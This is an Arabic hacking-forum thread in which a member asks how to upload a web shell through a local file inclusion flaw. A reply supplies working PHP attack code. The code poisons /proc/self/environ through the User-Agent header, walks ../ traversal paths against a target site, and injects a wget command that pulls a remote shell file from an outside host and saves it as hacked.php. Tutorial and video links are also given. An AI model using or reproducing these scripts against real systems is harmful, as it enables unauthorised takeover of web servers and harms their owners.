مشكله برفع شل ثغرة LF

حربي هكر · 10-19-2010, 02:35 AM

السلام عليكم ؟ اخواني انا اليوم مسكت معي ارفع شل بثغرة L F I

بس تابعت شرح ؟؟ بس مو واضح الي بالدوره والله مو واضح وملخبط مرة

فيه شرح ؟؟ عن طريق اضافه اداه فايرفوكس ؟؟

بس ممكن شخص يدلني على الطريقه

DaRk DrEaM · 10-19-2010, 10:09 AM

بأنتظار أحد الخبراء في هذا المجال يا غالي

KaLa$nikoV · 10-19-2010, 05:26 PM

عندك اكثر من طريقه للرفع كله يوصل لنفس الناتج

اهم شيء انك تقرا ملف

كود PHP:


			
proc/self/environ

لو عرفت تقراه معناه غصب راح نرفع لك شيل منها !!
شوف هون

كود:

 http://sc0rpion.ir/tutorial-clips/Getting-shell-by-lfi-via-user-agent.rar 
PHP script :

	كود PHP:
	
		
			
<?php 
ini_set('user_agent' , "<?php system('wget [shell] -O user.php'); ?> ");
$result = file_get_contents('http://[site]/../../proc/self/environ');
?>

هاد كود php بتعدل عليه الي بلزم ومعاه شرح يرفع لك شل بنفس الاسلوب لكن بدون الفايرفوكس !!

كمان كود اخر يقوم بنفس العمليه بس يختلف قليلا (رغم اني اشوفه فاشل بدون تجربه

كود PHP:


			


<?php



//Get Shell Via LFI(Local File Inclusion)

//Copyright BlackDream 2009 

//mr.pr0n you are the best boy





//edit this if you want. Linux Command

$cmd = "<?php system(\"wget http://h1.Spam.com/s0ra/s0ra.txt; mv shell.txt hacked.php\");?>";

$site = "http://www.evilsite.com/index.php?page="; //enter it like http://www.thesite.com/index.php?page=

$proc_path = "proc/self/environ"; //without first slash





//Do not edit below this line



preg_match( "@^(http://.*?)(/|$)@", $site, $matches );



$path = "";

$i = 0;



while ( 1 )

{

    if ( $i >= 20 )

        break;



    $path .= "../";

    $source = page_get_*******( $site . $path . $proc_path );

    if ( strstr($source, '********_ROOT') != false )

    {

        exit( "\nShell Uploaded With Success -> " . $matches[1] . '/' . "hacked.php" );

    } else

        echo "\nFail at state " . $i . "\n";

    $i++;

}



function page_get_*******( $url )

{

    global $cmd;

    $ch = curl_init( $url );

    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );

    curl_setopt( $ch, CURLOPT_HEADER, 0 );

    curl_setopt( $ch, CURLOPT_USERAGENT, $cmd );

    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, 2 );

    curl_setopt( $ch, CURLOPT_TIMEOUT, 4 );

    $ret = curl_exec( $ch );

    curl_close( $ch );

    return $ret;

}



?>







وهاد شرح روعه لسا ولا عربي شرحه 



ركز فيه كويس هو استخدم اسلوب سهل كثير



http://www.youtube.com/watch?v=OjUH5nsxm-w

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
مشكله بـ اكتشاف ثغرة وتحليل السيكربت	حربي هكر	جـــ'ابات العناكــ'ب	0	08-07-2010 08:47 PM
مساعده برفع شل من ebay-clone	awras	جـــ'ابات العناكــ'ب	4	04-22-2010 02:53 PM
مشكله في ثغرة حقن ؟؟؟	T-72	جـــ'ابات العناكــ'ب	8	03-20-2010 11:17 PM
فشل برفع الشل ؟؟	T-72	جـــ'ابات العناكــ'ب	4	01-22-2010 11:19 PM
لكل من واجه مشكله في ترقيع ثغرة vBulletin 3.8.4 PL1 XSS تم الحل	xman2	قســم تطويــر المــــواقع	4	12-08-2009 03:11 PM